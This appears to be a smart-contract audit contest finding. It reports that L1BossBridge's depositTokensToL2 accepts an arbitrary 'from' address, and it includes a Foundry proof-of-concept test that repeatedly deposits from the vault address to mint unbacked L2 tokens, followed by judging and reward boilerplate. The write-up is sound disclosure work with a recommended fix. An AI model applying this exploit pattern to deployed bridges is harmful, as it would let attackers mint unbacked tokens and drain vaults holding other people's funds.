Submission Details
Severity:
L1BossBridge.sol - depositTokensToL2 - Using Vault address to mint Free token on L2
Summary
Money Printer go BrrRrrRRRrRrrrr
A user could use the vault address as the Vault always have funds and use his address as the recipient
Vulnerability Details
The transfer from "Vault" to "Vault" is possible as the Vault will always have enough funds.
The exploiter could then set his address as the l2Recipient and keep minting free token
POC
function testVaultPrinter() public {
uint256 largeApprove = 100e18;
// Users deposit a large amount
vm.startPrank(user);
token.balanceOf(address(user));
token.approve(address(tokenBridge), largeApprove);
tokenBridge.depositTokensToL2(user, userInL2, largeApprove);
vm.stopPrank();
vm.startPrank(exploiter);
tokenBridge.depositTokensToL2(address(vault), exploiter, largeApprove);
tokenBridge.depositTokensToL2(address(vault), exploiter, largeApprove);
tokenBridge.depositTokensToL2(address(vault), exploiter, largeApprove);
vm.stopPrank();
}
Impact
High as the amount available on the L2 won't be balanced with the amount on the Vault , allowing the attacker to drain the Vault back on L1
Tools Used
Manual
Recommendations
use msg.sender instead of from in depositTokensToL2 method
Updates
Lead Judging Commences
0xnevi over 1 year ago
Submission Judgement Published Assigned finding tags:
depositTokensToL2(): abitrary from address
0xrektified
over 1 year ago
0xnevi
over 1 year ago
0xrektified
over 1 year ago
0xnevi
over 1 year ago
Rewards breakdown
nSLOC
99This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.